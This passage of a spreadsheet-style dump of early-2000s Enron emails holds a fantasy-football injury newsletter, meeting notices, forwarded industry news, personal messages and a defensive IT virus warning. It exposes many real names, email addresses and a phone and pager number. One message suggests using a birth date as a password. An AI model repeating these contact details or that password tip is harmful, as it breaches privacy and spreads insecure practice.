he closed portion of practice. !   Jerome Bettis , RB PIT - 2700 HUEVOS Upd=_x000D_
ated 12/28/01 Bettis, sidelined by a groin injury, returned to the practice=_x000D_
 field Thursday for the first time in a month. "Still questionable," coach =_x000D_
Bill Cowher said. "He did more today. We'll see how he feels (Friday) and g=_x000D_
o from there. We'll take it day to day."   Doug Brien , K IND - Free Agent =_x000D_
Updated 12/28/01 Brien signed a one-year contract Thursday night with the T=_x000D_
ampa Bay Buccaneers, who will use him against Baltimore if Martin Gramatica=_x000D_
 can't kick this week. Gramatica strained his right hamstring during a 48-2=_x000D_
1 victory over the Saints last week. Coach Tony Dungy hasn't ruled him out =_x000D_
for Saturday night's game against Baltimore, however the club wanted to hav=_x000D_
e a backup plan in case the Pro Bowl kicker isn't ready.   Ahman Green , RB=_x000D_
 GB - Baby Blues Updated 12/28/01 According to the Pro Football News and In=_x000D_
jury Report, Green has asthma, but he has practiced fully this week and wil=_x000D_
l start against the Vikings.   James Thrash , WR PHI - Pumpdog Updated 12/2=_x000D_
7/01 Thrash is listed as questionable with an ankle injury, but he is expec=_x000D_
ted to play against the Giants.   Todd Bouman , QB MIN - Pumpdog Updated 12=_x000D_
/27/01 Bouman practiced without pads on Wednesday. If he cannot practice fu=_x000D_
lly on Thursday, Spergon Wynn will get the start this week.   Aaron Shea , =_x000D_
TE CLE - Free Agent Updated 12/27/01 Shea is expected to miss the season's =_x000D_
final two games with a shoulder injury. O.J. Santiago should remain in the =_x000D_
starting lineup in Shea's place.   Wesley Walls , TE CAR - Cali Bound Updat=_x000D_
ed 12/27/01 Walls is listed as questionable with a knee injury. He was expe=_x000D_
cted to be evaluated again on Thursday.   Steve McNair , QB TEN - She Said =_x000D_
Updated 12/27/01 McNair missed practice Wednesday because of back pain.   "=_x000D_
I'm going to try to do some things tomorrow and hope it loosens up and not =_x000D_
have as much pain as I had today," McNair said.   "I'm not going to go out =_x000D_
and try to force the issue. If it's still sore and still tight where I can'=_x000D_
t have all my mechanics right, I'm not going to force the issue."     The T=_x000D_
itans listed him as questionable yet again Wednesday, but McNair likely wil=_x000D_
l play   Jerome Bettis , RB PIT - 2700 HUEVOS Updated 12/27/01 Bettis sat o=_x000D_
ut Wednesday's practice, and indicated he might not play in the regular sea=_x000D_
son's final two games. "You want to take care of the injury first and if th=_x000D_
at means not playing, that means not playing," Bettis told the Pittsburgh P=_x000D_
ost-Gazette . "But you want to make sure you're healed up. The team playing=_x000D_
 as well as it has played allows me the opportunity to get healthy. I'm usi=_x000D_
ng it very, very wisely."   Martin Gramatica , K TB - The Leather Cheerios =_x000D_
Updated 12/27/01 Gramatica sat out practice Wednesday, but is expected to t=_x000D_
est his injured leg on Thursday. Doug Brien and Brad Daluiso worked out Wed=_x000D_
nesday for the Buccaneers, who might sign one if Martin Gramatica can't kic=_x000D_
k against the Baltimore Ravens this week.   Matt Hasselbeck , QB SEA - Free=_x000D_
 Agent Updated 12/26/01 Trent Dilfer will start this week in place of Hasse=_x000D_
lbeck, whose separated left shoulder is too sore for him to play.    Coach =_x000D_
Mike Holmgren said Wednesday that Hasselbeck aggravated the injury, which h=_x000D_
e's had since the third week of the season, against the New York Giants las=_x000D_
t Sunday.   "There's a chance I might have him and he could play in an emer=_x000D_
gency-type situation, but he's pretty sore," Holmgren said.    More Updates=_x000D_
  Teams, Rosters  [IMAGE] [IMAGE]  [IMAGE] KMB Express Dutch Quigley    Pla=_x000D_
yer TM Pos Status Next Bye Manning, Peyton  IND QB Active @STL Week 4 Dillo=_x000D_
n, Corey  CIN RB Active PIT Week 8 Staley, Duce  PHI RB Active NYG Week 5 H=_x000D_
illiard, Ike  NYG WR Active @PHI Week 12 Stokes, J.J.  SF WR Active @DAL We=_x000D_
ek 6 Mason, Derrick  TEN WR Active CLE Week 3 Stewart, Tony  PHI TE Active =_x000D_
NYG Week 5 Nedney, Joe  TEN K Active CLE Week 3 Raiders  OAK DT Active @DEN=_x000D_
 Week 6 Weinke, Chris  CAR QB Reserve ARI Week 14 Henry, Travis  BUF RB Res=_x000D_
erve @NYJ Week 5 Redmond, J.R.  NE RB Reserve bye Week 16 Muhammad, Muhsin =_x000D_
 CAR WR Reserve ARI Week 14 Graham, Jeff  SD WR Reserve SEA Week 17 Sharpe,=_x000D_
 Shannon  BAL TE Reserve @TB Week 13 Kasay, John  CAR K Reserve ARI Week 14=_x000D_
 Jets  NYJ DT Reserve BUF Week 11  Total Active Players: 9 Total Reserve Pl=_x000D_
ayers: 8  NFL Injuries for KMB Express Updated Player Team Pos Injury Expec=_x000D_
ted Return 12/26/01 Graham, Jeff  SD WR Personal May miss Sunday's game 12/=_x000D_
27/01 Henry, Travis  BUF RB Knee Has been ruled out for Week 16 12/27/01 Mu=_x000D_
hammad, Muhsin  CAR WR Toe May miss the rest of the season [IMAGE]  Copyrig=_x000D_
ht 2001 Commissioner.COM Inc and SportsLine.com Inc. Your site can be reach=_x000D_
ed from http://fantasy.sportsline.com   FB10SP  =09_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 08:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rochmanm@spurr.org'})</t>
  </si>
  <si>
    <t>frozenset({'mday@gmssr.com', 'tomb@crossborderenergy.com', 'michael.alexander@sce.com'})</t>
  </si>
  <si>
    <t>RE: Change in Wood All-party Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">?That is extremely bush league, to make a change at this hour. _x000D_
_x000D_
I arranged my schedule around a 3:00 pm Wood meeting in SF and now am _x000D_
committed to an East Bay meeting in the morning. I may be able to make it _x000D_
there by 11:30 or noon._x000D_
_x000D_
-----Original Message----- _x000D_
From: Tom Beach _x000D_
To: Michael.Alexander@sce.com; MBD _x000D_
Cc: 'Skaff, Andy@Dynegy'; 'Dingwall, Brian@UEM'; 'John Burkholder'; 'Jun, _x000D_
Christine@aelaw'; 'Rick Counihan, Greenmountain.com'; 'Craig Chancellor'; _x000D_
'Colin Cushnie'; 'Bayless, David@Utility'; 'Elsesser, Evelyn@aelaw'; _x000D_
'Worster, Gerard@TXU'; 'Jeff Dasovich'; Jeff.Dasovich@enron.com; 'Jeff _x000D_
Fawcett, Transwestern'; jleslie@LUCE.com; 'Paul, Joe@Dynegy'; 'Johnson, _x000D_
Pamela@REMAC'; 'Karp, Joseph@Whitecase'; 'McCrea, Keith@CIG/CM'; _x000D_
kmills@CFBF.com; 'How-Downing, Lindsey'; MBD; 'Paul Amirault'; 'Phil Davies, _x000D_
WGSI Calgary'; 'Doug Porter'; 'Counihan, Rick'; 'Pocta, Robert M.'; 'Michael _x000D_
Rochman'; 'Scott, Susan@TW'_x000D_
_x000D_
Sent: 12/13/00 4:37 PM _x000D_
Subject: Change in Wood All-party Meeting _x000D_
_x000D_
Jonathan Lakritz just called to change the Wood all-party to 11 a.m. _x000D_
tomorrow. </t>
  </si>
  <si>
    <t>Mon, 16 Oct 2000 14:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.hain@enron.com', 'james.steffes@enron.com'})</t>
  </si>
  <si>
    <t>ITC release</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Steven J Kean/NA/Enron on 10/16/2000 09:16 PM -----_x000D_
_x000D_
	Karen Denne_x000D_
	10/16/2000 02:22 PM_x000D_
		 _x000D_
		 To: Mark Koenig/Corp/Enron@ENRON, Paula Rieker/Corp/Enron@ENRON, Steven J _x000D_
Kean/NA/Enron@Enron_x000D_
		 cc: Mark Palmer/Corp/Enron@ENRON_x000D_
		 Subject: ITC release_x000D_
_x000D_
fyi, the attached release which mentions PGE as one of six utilities forming _x000D_
an independent transmission company is scheduled to be released today._x000D_
---------------------- Forwarded by Karen Denne/Corp/Enron on 10/16/2000 _x000D_
02:23 PM ---------------------------_x000D_
From: Mark Fryburg/ENRON@Gateway on 10/16/2000 02:17 PM_x000D_
To: Karen Denne/Corp/Enron@ENRON, Mark Palmer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: ITC release_x000D_
_x000D_
As Kregg mentioned on the communication conf call today, here's the final_x000D_
draft of the release on the Independent Transmission Company that will go out_x000D_
this hour. It will not have a company letterhead._x000D_
_x000D_
Regards,_x000D_
_x000D_
- Mark_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 23 Sep 2000 02:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Exmar options</t>
  </si>
  <si>
    <t>This is not yet dead.  Apparently, Exmar and the shipyard are working to keep _x000D_
the options alive at least for a little while longer.  At the same time, I _x000D_
met with Amin in London yesterday (the organizer of Project Summer Lightning) _x000D_
who may have money to commit to this._x000D_
_x000D_
We will work with Amin and Exmar over the next several days to see if we _x000D_
could structure something where Amin's investors go long on a ship, and we _x000D_
have the exclusive right to use it with some money in it for his investors if _x000D_
we are able to make money with it._x000D_
_x000D_
This is a long shot, but we will try_x000D_
_x000D_
Rick</t>
  </si>
  <si>
    <t>Wed, 8 Aug 2001 07:11:41 -0700 (PDT)</t>
  </si>
  <si>
    <t>SB w/Jeff Harbert</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Sally's request</t>
  </si>
  <si>
    <t>Mon, 24 Sep 2001 15:50:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>Computer Virus</t>
  </si>
  <si>
    <t>_x000D_
There are several new computer viruses that are spreading rapidly on the internet.  The viruses target Windows computer users and arrives in e-mails with various subject lines like "Fwd:Peace BeTweeN AmeriCa and IsLaM!" The messages also contain attachments that can be directly executed by clicking on the attachment.  The most prevalent virus has an attachment named wtc.exe. _x000D_
_x000D_
If you ever get an email with an attachment that has an executable file, you should never launch the attachment.  At Enron, these file types are blocked automatically from entering our environment.  However, if you would connect to an external email service (i.e. Hotmail, AOL, Yahoo, etc) while using an Enron computer or attached to the Enron network, you could infect our internal computing systems.  If you do, the virus could cause significant issues and prevent some of our systems from working effectively._x000D_
_x000D_
If you ever get an email that you are not sure about, simply delete the email and contact your resolution center to let them know how you obtained the message.  It is much better to be safe than sorry as we will be able to track down the origin of the virus in the Enron Network._x000D_
_x000D_
Thank you._x000D_
Enron Global Technology</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 12:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'herman.manis@enron.com', 'roseann.engeldorf@enron.com', 'lisa.bills@enron.com'})</t>
  </si>
  <si>
    <t>RE: Deerfield development agreement</t>
  </si>
  <si>
    <t>One other item - we attempted to incorporate all the lessons learned from _x000D_
earlier work on the Pompano Developer's Agreement. I hope the attached is not _x000D_
too painful._x000D_
_x000D_
Thanks for your help._x000D_
_x000D_
Ben_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Mann, Kay  _x000D_
Sent: Thursday, May 31, 2001 6:48 PM_x000D_
To: Bills, Lisa; Manis, Herman; Engeldorf, Roseann_x000D_
Cc: Jacoby, Ben; Krimsky, Steven_x000D_
Subject: Deerfield development agreement_x000D_
_x000D_
Hello._x000D_
_x000D_
The commercial team  has asked that I forward this document to you for _x000D_
review.  It is a development agreement for a project in Florida.  We have _x000D_
attempted to address the accounting/E-Next issues, but please advise of any _x000D_
desired changes._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kay_x000D_
_x000D_
 &lt;&lt; File: Deerfield development ag May 31.DOC &gt;&gt; _x000D_
_x000D_
PS  Pardon the formatting.  It will be cleaned up by those with the ability _x000D_
to do so.</t>
  </si>
  <si>
    <t>Fri, 19 Jan 2001 03:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'johnelle.s.matthews@mail.sprint.com'})</t>
  </si>
  <si>
    <t>RE: Long Time...</t>
  </si>
  <si>
    <t xml:space="preserve">That's great for Maurice and Demetris!  Maurice will make such a good_x000D_
dad!_x000D_
_x000D_
I am doing the U of H Exec MBA program.  I go to school all day Friday_x000D_
and Saturday every other weekend.  As you can see, this is my weekend_x000D_
off from class.  The most attractive thing about the program is that_x000D_
it's only a year long!  So, we started in Jan and graduate in Dec.  This_x000D_
year has already been intensive though with working full-time and trying_x000D_
to study, read, and write case studies.  FYI-Enron's VP of Corporate_x000D_
Finance (Dan Castagnola) is in my class and he is very funny. The class_x000D_
discussions have been pretty interesting so far and since I am the_x000D_
youngest person in the class I have learned quite a bit from others._x000D_
Almost everything is done in these teams that you stay in all year.  I_x000D_
know it will be worth it though come December.  I would have liked to_x000D_
have done UT's program because of the name and recognition but with me_x000D_
being in Houston already this was most feasible. So, pray for me and I_x000D_
know everything will be ok._x000D_
_x000D_
And yes, you are getting old but I am sure you look as young as you were_x000D_
in high school 'cause I know I do! (smile)_x000D_
But no, really, I do! :)_x000D_
_x000D_
-----Original Message-----_x000D_
From: Errol.McLaughlin [mailto:Errol.McLaughlin@enron.com]_x000D_
Sent: Friday, January 19, 2001 11:29 AM_x000D_
To: johnelle.s.matthews_x000D_
Subject: RE: Long Time..._x000D_
_x000D_
_x000D_
_x000D_
Maurice and Demetrius are doing great, and they just found out that_x000D_
they're_x000D_
pregnant!  My dad is still working --- I think they are going to have to_x000D_
drag him out kicking and screaming.  Where are you going to school?  How_x000D_
long do you have left?_x000D_
_x000D_
I'm glad you e-mailed.  It is nice to catch up and see what your doing._x000D_
_x000D_
What's up with the 'old' crack!  Baby, I'm just aging like fine wine!!!_x000D_
: )_x000D_
_x000D_
Errol L. McLaughlin_x000D_
Lead - Financial Trading Risk Mgmt_x000D_
Enron North America_x000D_
Voice: 713-345-8274_x000D_
Motorola 2Way Pgr: 1-877-241-1059 (8772411059@pagenetmessage.net)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 02:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: invoices</t>
  </si>
  <si>
    <t xml:space="preserve">When I was at the site it said that it had sent a new password to me at _x000D_
kay.mann@enron.com.  Didn't get here.  I give up._x000D_
_x000D_
_x000D_
From: Suzanne Adams@ECT on 05/25/2001 09:21 AM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: invoices  _x000D_
_x000D_
Did they actually change it.  If not try your birthyear and then your birthday_x000D_
_x000D_
19550805 for example.  My birthday is 8/5/55_x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	05/25/2001 08:56 AM_x000D_
		 _x000D_
		 To: Suzanne Adams/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: invoices_x000D_
_x000D_
never received a pass word._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 14:46:57 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: gas &amp; power interviewers Trading Track</t>
  </si>
  <si>
    <t xml:space="preserve">ok ,let me know where and when_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Buckley, Karen  _x000D_
Sent:	Monday, October 29, 2001 3:44 PM_x000D_
To:	Ruscitti, Kevin; Keavey, Peter F.; Bass, Eric_x000D_
Subject:	FW: gas &amp; power interviewers Trading Track_x000D_
_x000D_
Kevin/Peter/Eric_x000D_
_x000D_
We are holding 32 interviews for the ENA Trading Track this Thursday, November 1st from 2.30 pm onwards.   Your names have been passed to me by Hunter Shively.    Can you please confirm you can interview at this time.   All the interviewers are gas &amp; power traders._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Karen._x000D_
x54667_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shively, Hunter S.  _x000D_
Sent:	Monday, October 29, 2001 3:41 PM_x000D_
To:	Buckley, Karen_x000D_
Subject:	RE: gas &amp; power interviewers Trading Track_x000D_
_x000D_
Kevin Ruscitti_x000D_
Pete Keavey_x000D_
Eric Bass_x000D_
</t>
  </si>
  <si>
    <t>Tue, 21 Aug 2001 07:41:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'maria.hernandez@lbb.state.tx.us'})</t>
  </si>
  <si>
    <t>inquiry</t>
  </si>
  <si>
    <t xml:space="preserve">Juan,_x000D_
_x000D_
it was $20 bucks, not fifty!_x000D_
_x000D_
Crissy_x000D_
 - TEXT.htm </t>
  </si>
  <si>
    <t>Mon, 27 Aug 2001 06:40:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michelle.bruce@enron.com', 'f..herod@enron.com', 'james.scribner@enron.com', 'sam.leuschen@enron.com', 'e..moscoso@enron.com', 'james.new@enron.com', 'peggy.hedstrom@enron.com', 'sheila.glover@enron.com', 'c..gossett@enron.com', 'brian.gillis@enron.com', 'w..white@enron.com', 'nancy.hernandez@enron.com', 'm.hall@enron.com', 'kathy.reeves@enron.com', 'a..price@enron.com', 'shona.wilson@enron.com', 'mike.jordan@enron.com', 'beth.apollo@enron.com', 'andrew.cornfield@enron.com', 'kevin.sweeney@enron.com', 'scott.mills@enron.com', 'todd.hall@enron.com', 'toby.ellis@enron.com', 'j..hanson@enron.com', 'shelly.wood@enron.com', 'leslie.reeves@enron.com', 'christy.lobusch@enron.com', 'shelly.stubbs@enron.com'})</t>
  </si>
  <si>
    <t>Updated: 1st meeting regarding global operation standards</t>
  </si>
  <si>
    <t xml:space="preserve">This will be the 1st session to discuss proposed global operational standards and reporting.  For those who can not attend this meeting we will schedule a follow up.  </t>
  </si>
  <si>
    <t>Mon, 11 Mar 2002 14:52:41 -0800 (PST)</t>
  </si>
  <si>
    <t>Red Lake Storage</t>
  </si>
  <si>
    <t>Lindy,_x000D_
_x000D_
We are meeting on Tues at 10:00 in 1336 to discuss how TW may handle a storage point on our system with respect to how we contract for this point (given that contracts will want to receive and deliver to this point on a firm basis) as well as how we schedule gas at this point.  Will you be able to attend and give us your advise?_x000D_
_x000D_
Many thanks, Kim.</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 03:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Bullets</t>
  </si>
  <si>
    <t xml:space="preserve">Martha, I don't have any bullets but could you please send me last week's -- _x000D_
I think there are some old ones that need to be deleted.  Thanks._x000D_
_x000D_
_x000D_
MARTHA _x000D_
BENNER        _x000D_
12/07/2000 01:00 PM_x000D_
_x000D_
To: Lee Huber/ET&amp;S/Enron@ENRON, Tony Pryor/ET&amp;S/Enron@ENRON, Susan _x000D_
Scott/ET&amp;S/Enron@ENRON_x000D_
cc: Janet Cones/FGT/Enron@ENRON, Denise LaGesse/ET&amp;S/Enron@ENRON, Ann _x000D_
Smith/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Bullets_x000D_
_x000D_
Please get your bullets in tomorrow in the morning.  Tomorrow night is our _x000D_
Christmas party and we want to leave the office early so we can get home and _x000D_
get pretty before the event._x000D_
_x000D_
Thanks......Martha_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 23 Aug 2001 07:43:48 -0700 (PDT)</t>
  </si>
  <si>
    <t>_x000D_
FYI. The first leg of the trip has been confirmed._x000D_
_x000D_
Vince._x000D_
 -----Original Message-----_x000D_
From: 	"Frank A. Wolak" &lt;wolak@zia.stanford.edu&gt;@ENRON [mailto:IMCEANOTES-+22Frank+20A+2E+20Wolak+22+20+3Cwolak+40zia+2Estanford+2Eedu+3E+40ENRON@ENRON.com] _x000D_
Sent:	Thursday, August 23, 2001 9:26 AM_x000D_
To:	Kaminski, Vince J_x000D_
Subject:	RE:_x000D_
_x000D_
Vince,_x000D_
_x000D_
  4 pm on September 4 and I'd be happy to go to dinner._x000D_
_x000D_
Frank_x000D_
_x000D_
At 08:33 AM 8/23/01 -0500, you wrote:_x000D_
&gt;Frank,_x000D_
&gt;_x000D_
&gt;Thanks for your message._x000D_
&gt;_x000D_
&gt;What about a meeting on Tuesday, September the 4th._x000D_
&gt;We could meet at your office, let's say at 4 p.m. We would be delighted if_x000D_
&gt;you_x000D_
&gt;could join us for dinner later in the evening on the same day._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;Vince_x000D_
&gt;_x000D_
&gt;     -----Original Message-----_x000D_
&gt;    From:   "Frank A. Wolak" &lt;wolak@zia.stanford.edu&gt;@ENRON_x000D_
&gt;_x000D_
&gt;[mailto:IMCEANOTES-+22Frank+20A+2E+20Wolak+22+20+3Cwolak+40zia+2Estanford+2_x000D_
&gt;Eedu+3E+40ENRON@ENRON.com]_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;    Sent:   Wednesday, August 15, 2001 11:13 AM_x000D_
&gt;    To:     Kaminski, Vince J_x000D_
&gt;    Subject:_x000D_
&gt;_x000D_
&gt;    Vince,_x000D_
&gt;_x000D_
&gt;     I'll be out of the country for the next_x000D_
&gt;    two weeks, but should be back September 3_x000D_
&gt;    and will be in the office all that week._x000D_
&gt;_x000D_
&gt;    Frank_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;**********************************************************************_x000D_
&gt;This e-mail is the property of Enron Corp. and/or its relevant affiliate_x000D_
&gt;and may contain confidential and privileged material for the sole use of_x000D_
&gt;the intended recipient (s). Any review, use, distribution or disclosure by_x000D_
&gt;others is strictly prohibited. If you are not the intended recipient (or_x000D_
&gt;authorized to receive for the recipient), please contact the sender or_x000D_
&gt;reply to Enron Corp. at enron.messaging.administration@enron.com and_x000D_
&gt;delete all copies of the message. This e-mail (and any attachments hereto)_x000D_
&gt;are not intended to be an offer (or an acceptance) and do not create or_x000D_
&gt;evidence a binding and enforceable contract between Enron Corp. (or any of_x000D_
&gt;its affiliates) and the intended recipient or any other party, and may not_x000D_
&gt;be relied on by anyone as the basis of a contract by estoppel or_x000D_
&gt;otherwise. Thank you._x000D_
&gt;**********************************************************************</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 07:15:14 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'t..lucci@enron.com', 'j..bump@enron.com', 'tyrell.harrison@enron.com', 'paul.miller@enron.com'})</t>
  </si>
  <si>
    <t>FW: WESTERN FRONTIER PROJECT</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Miller, Stephanie  _x000D_
Sent:	Monday, October 29, 2001 7:54 AM_x000D_
To:	Whitt, Mark_x000D_
Subject:	FW: WESTERN FRONTIER PROJECT _x000D_
_x000D_
_x000D_
FYI - WE'RE CHECKING ON ENTERGY_x000D_
 -----Original Message-----_x000D_
From: 	Calcagno, Suzanne  _x000D_
Sent:	Monday, October 29, 2001 7:53 AM_x000D_
To:	Kinsey, Lisa; Sullivan, Patti; Schrab, Mark L.; Miller, Stephanie; Superty, Robert_x000D_
Subject:	WESTERN FRONTIER PROJECT _x000D_
_x000D_
WILLIAMS PUTS MEAT ON THE BONES OF WESTERN FRONTIER PROJECT DESIGN_x000D_
_x000D_
Touting a need for more pipeline capacity linking the "prolific" supply basins of the central Rockies and increasingly hungry Mid-Continent markets, The Williams Cos. Inc. last week took the next step by filing for authorization to build and operate the Western Frontier project._x000D_
_x000D_
The sponsor has in hand four negotiated-rate deals for long-term service covering roughly two-thirds of the 540,000 Dt/day of project design capacity, it told FERC in an Oct. 24 certificate application (CP02-11). Williams wants to have the $366 million project up and running by Nov. 1, 2003; it asked the commission to issue a final certificate by Dec. 11, 2002, so that it can commence construction by the following April._x000D_
_x000D_
Williams unveiled initial plans for Western Frontier early last summer (IF, 9 July, 14) and held an open season in June and July. To carry gas from the Power River, Big Horn, Wind River and Green River basins- estimated to hold 173 Tcf of potential and recoverable reserves - the new 30-inch-diameter mainline would run 398 miles, starting at the Cheyenne Hub and ending at an interconnection with the system of affiliate Williams Gas Pipelines Central Inc. in Beaver County, Okla. Characterizing the Cheyenne Hub as "a liquid point of supply," Williams asserted that "presently, supply capability to the hub has outpaced transportation capacity away from the hub to market areas due to insufficient pipeline infrastructure."_x000D_
_x000D_
Along the way, the Western Frontier mainline would make another interconnection with Williams Central as well as with Northern Natural Gas Co., ANR Pipeline Co., Natural Gas Pipeline Co. of America and Panhandle Eastern Pipeline Co., "thus providing multiple avenues for gas produced in the central Rockies to be transported throughout the Mid-Continent using the existing pipeline grid."_x000D_
_x000D_
To "further enhance its supply options," the sponsor wants to build a 9.7-mile lateral from the mainline to the Wattenberg gas processing plant east of Denver to tap the Denver-Julesberg basin. Rounding out the project design are two new compressor stations, the 10,000-horsepower Chalk Bluff station to be constructed at the Cheyenne Hub and the 20,000-hp Denver station to be built in Adams County, Colo. Following the open season, Williams hammered out precedent agreements with Marathon Oil Co. (75,000 Dt/day), Williams Energy Marketing and Trading Co. (200,000 Dt/day), Utilicorp United Inc. (15,000 Dt/day) and Entergy Power Generation Corp. (75,000 Dt/day). The initial term for the deals is 10 years, except for Marathon which committed to a five-year term with an option to extend it an additional two years, said the application._x000D_
_x000D_
"Other shippers have expressed serious interest for the remaining capacity on Western Frontier, and active negotiations are moving forward with these potential shippers," said the application, adding that Williams was "confident . . . that the remaining capacity will be committed in the upcoming months." With the addition of compression, the project could "facilitate relatively inexpensive expansions to accommodate future market growth," the sponsor told FERC. And that may well be necessary, it continued, pointing to "stagnant to declining supply" in the Mid-Continent basins coupled with "projected demand increases." As in many areas of the country, "much of the anticipated demand increase is attributed to installation and operation of . . . gas-fired electrical generation," it said. The 11,439 Mw of "active winter generating capacity" in the combined service areas of Western Frontier and Williams Central is expected to more than double by 2004, said Williams._x000D_
_x000D_
The application seeks negotiated rate authority for the project operator, Western Frontier Pipeline Co. LLC, and approval of initial recourse rates. The maximum daily reservation rate under schedule FTS would be 35?/Dt for contract demand in Zone 1 and 79.4?/Dt in Zone 2. Under the negotiated deals reached with the four "anchor" shippers, Utilicorp and Entergy would pay a combined reservation and commodity rate of 25?/Dt at a 100% load factor for Zone 1 service to the Williams Central Hugoton station in Kansas, while WEM&amp;T would pay a combined rate of 30?/Dt for Zone 2 transportation to the Williams Central system in Oklahoma and Marathon would pay 32?/Dt under the shorter contract for Zone 2 service to interconnects with ANR, Panhandle and Williams Central in_x000D_
Oklahoma. All transportation would originate at the Cheyenne Hub.</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 05:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ed.robinson@enron.com'})</t>
  </si>
  <si>
    <t>What's Next?</t>
  </si>
  <si>
    <t>My consulting assignment at Azurix will end next month, so I've put calls in _x000D_
to Cliff and Mark Metts to see if either of them needs help with either _x000D_
corporate trouble-shooting, or M&amp;A execution. _x000D_
_x000D_
I thought I should also ask a related question of the two of you: anything _x000D_
that I could assist you with? _x000D_
_x000D_
As to the question whether I can be helpful, I believe that Colin, John, and _x000D_
Michael have been pleased with my contributions, though you should ask them _x000D_
directly._x000D_
_x000D_
Please let me know if you have any ideas._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 11:19:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'beverly.miller@enron.com', 'alice.johnson@enron.com', 'jean.adams@enron.com', 'galen.coon@enron.com', 'legale.black@enron.com', 'alma.carrillo@enron.com', 'shirley.walden@enron.com', 'joe.linhart@enron.com', 'tracy.minter@enron.com', 'scott.hibbard@enron.com', 'mary.draemer@enron.com', 'james.carr@enron.com', 'gerald.skertich@enron.com', 'debra.scurlock@enron.com', 'linda.ward@enron.com', 'jerry.wilkens@enron.com', 'alma.green@enron.com', 'larry.davis@enron.com', 'josue.vasquez@enron.com', 'sherry.forbish@enron.com', 'randy.janzen@enron.com', 'randy.bryan@enron.com', 'janet.mcdaniel@enron.com', 'larry.berger@enron.com', 'jean.blair@enron.com', 'dennis.lee@enron.com', 'james.studebaker@enron.com', 'laura.giambrone@enron.com', 'renee.perry@enron.com', 'cynthia.rivers@enron.com', 'michael.bodnar@enron.com', 'dale.eldridge@enron.com', 'tim.cooper@enron.com', 'richard.hanagriff@enron.com', 'toby.kuehl@enron.com', 'robert.benningfield@enron.com', 'kathy.sturr@enron.com', 'chris.greaney@enron.com', 'gerry.medeles@enron.com', 'raetta.zadow@enron.com', 'karen.clapper@enron.com', 'patricia.steele@enron.com', 'toby.summers@enron.com', 'mary.phillips@enron.com', 'zuela.carter@enron.com', 'patrick.barry@enron.com', 'esther.dasilva@enron.com', 'marion.collins@enron.com', 'william.aldinger@enron.com', 'bert.hernandez@enron.com', 'ava.garcia@enron.com', 'harry.woodson@enron.com', 'kathy.washington@enron.com', 'diana.porter@enron.com', 'cara.vaughan@enron.com', 'amy.mulligan@enron.com', 'jack.howard@enron.com', 'elizabeth.brown@enron.com', 'jacob.conklin@enron.com', 'christine.mcevoy@enron.com', 'terry.kowalke@enron.com', 'l.miller@enron.com', 'maggie.matheson@enron.com', 'lynn.blair@enron.com', 'nancy.callans@enron.com', 'james.cramer@enron.com', 'karen.brostad@enron.com', 'nancy.bastida@enron.com', 'ramona.betancourt@enron.com', 'lynda.laferla@enron.com', 'linda.trevino@enron.com'})</t>
  </si>
  <si>
    <t>RE: Scheduled Qty Report</t>
  </si>
  <si>
    <t>Sheila,_x000D_
NNG has had about 6 Shippers complain about the report change._x000D_
_x000D_
John Buchanan_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Garcia, Ava =20_x000D_
Sent:=09Monday, October 15, 2001 1:18 PM_x000D_
To:=09Berger, Larry; Blair, Lynn; Bodnar, Michael; Buchanan, John; Kowalke,=_x000D_
 Terry; Zadow, Raetta; Barry, Patrick; Blair, Jean; Bryan, Randy; Callans, =_x000D_
Nancy; Carr, James; Clapper, Karen; Perry, Renee; Porter, Diana; Walden, Sh=_x000D_
irley; Washington, Kathy; Wilkens, Jerry; Bastida, Nancy; Brostad, Karen; B=_x000D_
rown, Elizabeth; Carrillo, Alma; Carter, Zuela; Dasilva, Esther; Davis, Lar=_x000D_
ry; Eldridge, Dale; Green, Alma; Hanagriff, Richard; Johnson, Alice; Lee, D=_x000D_
